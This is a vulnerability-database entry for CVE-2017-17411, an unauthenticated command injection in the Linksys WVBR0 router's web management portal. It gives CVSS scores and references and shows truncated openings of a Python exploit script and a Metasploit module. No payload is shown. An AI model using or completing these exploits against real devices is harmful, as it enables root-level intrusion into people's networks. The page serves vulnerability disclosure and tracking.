Published: 21/12/2017 Updated: 28/08/2018

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

This vulnerability allows remote malicious users to execute arbitrary code on vulnerable installations of Linksys WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges. Was ZDI-CAN-4892.

Vulnerable Product	Search on Vulmon	Subscribe to Product
linksys wvbr0_firmware

#!/usr/bin/python # -*- coding: utf-8 -*- # Author: Nixawk # CVE-2017-17411 # Linksys WVBR0 25 Command Injection """ $ python27 exploit-CVE-2017-17411py [*] Usage: python exploit-CVE-2017-17411py <URL> $ python27 exploit-CVE-2017-17411py examplecom/ [+] Target is exploitable by CVE-2017-17411 """ import requests def check(u ...

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys W ...

CWE-78 https://zerodayinitiative.com/advisories/ZDI-17-973 https://www.exploit-db.com/exploits/43363/https://github.com/rapid7/metasploit-framework/pull/9336 http://www.securityfocus.com/bid/102212 https://www.exploit-db.com/exploits/43429/https://nvd.nist.gov https://www.exploit-db.com/exploits/43363/

CVE-2017-17411

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect